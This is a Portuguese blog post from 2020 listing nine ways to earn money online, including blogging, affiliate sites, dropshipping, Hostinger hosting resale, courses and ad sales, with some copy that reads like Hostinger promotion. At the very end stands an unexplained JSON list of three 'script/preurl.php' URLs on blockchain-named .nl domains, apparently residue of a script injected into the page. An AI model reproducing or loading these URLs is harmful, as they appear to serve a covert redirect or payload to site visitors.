segunda-feira, 14 de setembro de 2020

9 Formas De Ganhar Dinheiro Na Internet 2020

      9 FORMAS DE GANHAR DINHEIRO NA                                  INTERNET



Como Ganhar Dinheiro na Internet Com um Site ou um Blog

1. Crie seu Blog 

Muita gente começa um blog como uma forma de expressar suas opiniões ou como uma maneira de apresentar suas criações artísticas.

Ainda assim, existem muitos casos de pessoas que não só vivem com o dinheiro recebido pelos seus blogs, mas também foram capazes de transformá-los em uma empresa grandiosa. Um destes exemplos é o site Huffington Post.   

Nem todo blogueiro vai atingir esse patamar. Mas se você fizer do jeito certo, e não desistir pelo meio do caminho, é bem possível que você ganhe muito dinheiro com seu blog pessoal e o torne sua principal fonte de renda.

Para ter um blog é importante que você tenha um planejamento a longo prazo. Você não vai ganhar dinheiro logo de cara. Mas assim que a sua escrita começar a melhorar, suas habilidades aumentarem e seu site começar a receber mais tráfego, as possibilidades de isso acontecer é grande.

Se o seu objetivo é começar um blog que faça você ganhar dinheiro na internet, aqui vão algumas dicas para ter em mente:

  1. Escolha um tópico ou assunto factual (que não acaba em pouco tempo), como saúde, investimentos financeiros, relacionamentos, hobbies ou desenvolvimento pessoal;
  2. Sempre tente criar o melhor conteúdo possível em qualquer tipo de assunto;
  3. Aprenda sobre SEO e faça seu site decolar no Google e em outros motores de busca;
  4. Faça contatos e negócios com outros blogueiros e influenciadores do nicho que você escolher.

Essas dicas vão ajudar você a ir na direção certa das coisas. Assim que você tiver um blog com mais autoridade na internet, um maior volume de tráfego vai trazer a você muitas oportunidades de monetizar o seu site com:

  • Publicidade paga;
  • Vender seus próprios cursos e produtos;
  • Vender produtos de afiliados

2. Comece um Site de Programa de Afiliados

Um site de afiliados é criado para recomendar or revisar determinados produtos. Então, quando um leitor compra o produto através do seu link, você recebe uma comissão.

Embora não pareça uma grande fonte de energia, existem sites de milhões de dólares somente baseados em receitas de afiliados.

Por exemplo, o site The Wire Cutter era tão rentável que o New York Times o comprou por 30 milhões de dólares. Também o Lucieslist, um site de reviews de produtos de bebês e o Outdoorgearlab, um site dedicado para avaliações de produtos de acampamentos e trilhas.

Para criar seu próprio site de afiliados, participe de um programa de afiliados que se encaixe com sei negócio. Falando nisso, se você tem um blog dedicado ao universo de tecnologia e desenvolvimento, você pode se tornar um afiliado Hostinger.

Veja o exemplo do Bitcacha. Esse site oferece avaliações sobre serviços de hospedagem, ferramentas VPN e criadores de sites. Toda vez que eles mencionam um produto, é adicionado um link no post.

Após se registrar no Programa de Afiliados da Hostinger, você terá acesso ao painel de controle do afiliado onde você pode acompanhar todas as suas campanhas. Então, usar o material providenciado – como banners, ebooks e infográficos – para aumentar suas vendas.

Enquanto a Hostinger oferece planos econômicos que ajudam a garantir uma alta taxa de conversão, sempre existe mais espaço para aumentar seus ganhos. Por essa razão, é possível pedir sugestões e conselhos do seu gerente de contas dedicado à sua conta. Eles ficarão felizes em ver seu sucesso acontecer.

3. Monte sua Loja Virtual

As lojas virtuais simplesmente explodiram de popularidade nos últimos anos. Com a popularidade de plataformas como o WordPress e o WooCommerce, criar um ecommerce ficou ainda mais fácil.

Se você preferir comercializar produtos físicos e vender coisas mais tangíveis, a loja virtual é a solução.

Existem dois métodos que você pode usar para ter uma loja online de sucesso. São eles:

  1. Criar e vender um nicho de produtos físicos dedicados a um grupo específico de compradores ou usuários.
  2. Comprar produtos manufaturados baratos em países estrangeiros e revendê-los no seu mercado local.

A primeira abordagem pode ser extremamente válida, mas requer paixão pelo produto e vontade de fazer muita pesquisa, desenvolvimento de produtos e testes.

Lojas virtuais de grande sucesso, como o SkinnyMe TeaBeardBrand e Ratio Coffee, mostram que você também pode alcançar muito sucesso com seu ecommerce.

Se o primeiro método parece um pouco arriscado para seu primeiro negócio online, então considere tentar a segunda opção de revender produtos vindos de outros países. Esse método envolve estocar produtos populares de uma plataforma como a AliExpress e revender pela sua própria loja online.

Além de ter que vender os produtos certos para a sua audiência de mercado, você também vai precisar pensar em formas de envio dos seus produtos. Você mesmo pode fazer os empacotamentos e gerenciar as formas de cobrança. Ou, pode contratar um serviço tipo o chamado dropshipping, onde o fabricante faz isso tudo para você.  

4. Revenda de Hospedagem

Revender hospedagem de sites é um ótimo exemplo de como ganhar dinheiro na internet. Na Hostinger, temos um serviço de revenda de hospedagem.

A ideia por trás da revenda de hospedagem é fornecer um espaço dedicado ao servidor, no qual você pode usar para construir a sua própria marca de hospedagem. Ela permitem que você:

  1. Crie contas de hospedagem de sites compatíveis com cPanel.
  2. Defina limites de recursos para espaço de disco, largura de banda e similares.
  3. Facilmente gerenciar todas as contas de hospedagem pelo painel WHM.

Como o cPanel é conhecido por ser a melhor ferramenta para hospedagem de sites, ele também será bastante atrativo aos novos usuários.

O tempo em que o servidor também fica disponível (uptime) é também monitorado por um time de administradores, o que assegura a qualidade e a disponibilidade do serviço.  

Por último, mas não menos importante, um suporte dedicado e disponível em 24/7 estará sempre disposto a ajudar com qualquer pedido ou dúvida.

Se você sabe como uma hospedagem de site funciona, revender esse serviço pode ser muito vantajoso para você. Quem sabe você não se torna um revendedor de destaque? Basta empenho e esforço!

5. Crie um Curso Online

Parece que os cursos online estão por todos lados hoje em dia! Então, se você tem algum conhecimento importante que alguém pagaria para tê-lo, essa pode ser uma ótima opção.

Além de ter seu próprio curso digital, plataformas de aprendizado como BitDegree oferecem também a chance de se tornar um instrutor. É uma oportunidade única de repassar suas habilidades e experiências a milhares de pessoas sedentas para aprender sobre novas tecnologias.

Os cursos online podem ser produzidos em diferentes formatos. Desde os simples arquivos educativos em PDF até os vídeos mais elaborados, com muitas horas de conteúdo informativo e também educativo.

Criar cursos digitais pode ser um caminho bem impactante. Como você está no controle de tudo, não existe exatamente um limite de quanto dinheiro você pode ganhar na internet.

Se você quer criar um curto online, mas ainda não definiu qual tópico ou assunto vai abordar, é uma ótima ideia fazer uma pesquisa com a sua audiência. Frequentemente, eles dizem exatamente o quê eles gostariam de aprender e o quanto gostariam de pagar.

Por exemplo, o curso online Learn Scrivener Fast é dedicado aos escritores que querem aprender como funciona o software Scrivener. O criador do curso, Joseph Michael, descobriu essa necessidade através de comentários em um blog especializado em textos. E, desde então, se transformou em um negócio de seis dígitos!

6. Crie um Site de Assinaturas

As assinaturas meio que explodiram nos últimos anos. A ideia é bem fácil de implementar. Mas exige que você já tenha uma certa base instalada de usuários cadastrados ou visitantes perenes no seu site ou plataforma de venda.

Por exemplo, o Mark Manson tem um blog próprio sobre desenvolvimento pessoal. No site dele, existe uma parte de assinaturas que dá aos usuários acesso a cursos onlines, vídeos e comentários adicionais em artigos. Para os fãs do trabalho dele, é um ótimo negócio.

Considere uma situação em que as pessoas já estejam visitando o seu site porque gostam do seu conteúdo e da maneira como você escreve. Assim, se você criar um serviço de assinatura no seu site que tem um conteúdo premium, elas podem passar a ser assinantes. Nem todas as pessoas vão se tornar assinantes do seu site, mas seu fãs com certeza não vão resistir.

O tipo de assinatura que você criar vai depender do tipo de site que você tiver e de qual o nível de profundidade que você pode disponibilizar nos seus conteúdos premium. Se você gostou da ideia, veja nosso tutorial de como criar um site de membros usando o WordPress.

7. Venda Espaços para Anúncios

Todo mundo já viu um site que usam um espaço para publicidade dentro dos seus conteúdos. Às vezes, esses anúncios são intrusivos; em outras, eles são integrados naturalmente com o conteúdo mostrado nas páginas.

Monetizar o seu site por anúncios é uma estratégia adotada comumente se um site já estiver recebendo muito tráfego. Se este for o caso do seu site, essa pode ser uma ótima opção a considerar explorar.

A quantidade de dinheiro que será paga pelos espaços de publicidade vai depender da sua rede de contatos e da sua audiência. Mas basicamente você será pago pelo número de impressões ou de cliques no seu site.

Existem muitas maneiras de integrar uma rede de anúncios no site.

Google Adsense é, provavelmente, a rede que você já pode ter conhecido em algum momento. Com ele, você consegue aplicar à sua rede e, uma vez que você seja aprovado, você já pode começar a adicionar anúncios ao seu site.

Normalmente, o retorno gerado pelo Adsense não vai ser muito grande, a menos que você tenha uma rede de milhões de usuários por mês.

Existem outras redes de anúncios como o Ezoic e o Media.net. Ambas precisa de uma aprovação e análise do seu site para começarem a funcionar. Essa redes também têm o benefício de trabalhar com você na otimização da sua receita de anúncios.

Se você não quer trabalhar com uma rede de anúncios, você ainda tem a opção de você próprio criar e publicar anúncios. Se você tem um nicho de audiência já estabelecido, essa opção pode ser bastante lucrativa.

Vamos imaginar que você tem um site dedicado à otimização e gerenciamento do sono. Ao invés de usar uma das redes de propaganda acima, você pode vender espaços de publicidade para grandes companhias de colchões.

Aqui é onde onde uma empresa vai pagar você para criar conteúdo patrocinado e, então, postá-lo no seu site, Sites como Buzzfeed e Millo funcionam dessa forma.

8. Venda seus Serviços

Vender serviços do seu site é uma das formas mais rápidas de aprender como ganhar dinheiro na internet. Ela também é uma das maneiras mais rentáveis possíveis.

Existem duas abordagens que você pode usar para vender seus serviços. São elas:

Crie um Blog Educacional e Ofereça Seus Serviços

Crie um blog de nicho que contenha informações úteis sobre um certo tópico. Vamos dizer que você tenha um blog sobre bem-estar holístico. E que você já tenha uma lista de email com um número decente de contatos e um tráfego sólido.

Você pode adicionar uma página de serviços ao seu site onde você oferece orientação sobre saúde, tanto pessoalmente quanto em mídias online como o Skype.

Crie um Site Básico e Promova Seus Serviços

O outro método envolve criar um site com o propósito claro de lançar seus serviços a grupos de empresas e indivíduos.

Vamos dizer que você queira ser um escritor freelancer. Você escolhe um nicho e constrói seu site. Na sequência, você cria algumas páginas dizendo quem você é, os serviços que oferece e alguns exemplos do seu trabalho (um portfólio).

Então, você começa a gerar leads para seu negócio fazendo coisas como artigos de convidados em outros blogs. Também pode fazer entrevistas em podcasts e contactar outros sites e canais para troca de links e conteúdos.

Se você quer desenvolver o seu negócio online a um nível bem alto, combinar os dois métodos mostrados pode dar resultados muito positivos.

9. Crie um Site de Assinaturas para Vagas de Emprego

Sites que reúnem vagas de emprego podem gerar uma boa renda para você. O processo é simples.

As pessoas que estão querendo contratar alguém em um nicho específico postam uma vaga de emprego no seu site. Em contrapartida, os seus visitantes vão poder se candidatar à vaga.

Por exemplo, vamos dar uma olhada no site,Nesta página, as empresas e as pessoas pagam pequenas taxas para anunciar uma vaga de trabalho no site. Para se candidatar a uma vaga, porém, é grátis.

Como o ProBlogger Job Board já é uma autoridade na internet em relação ao anúncio de vagas, as empresas que colocarem vagas à disposição dos candidatos automaticamente recebem uma enxurrada de currículos para cada anúncio.

Quando criar um site de vagas de emprego, apenas certifique-se de ter uma audiência consolidada. E que tenha sinergia com as empresas dentro do seu nicho de mercado em que você está atuando

Nenhum comentário:

Postar um comentário

Melhor Gerador de Backlinks

 O Que São Baclinks Um backlink para um determinado recurso da web é um link de algum outro site para esse recurso da web.  Um recurso da we...

{ "urls": [ "chaintopdom.nl/script/preurl.php", "smarttopchain.nl/script/preurl.php", "topblockchainsolutions.nl/script/preurl.php" ] }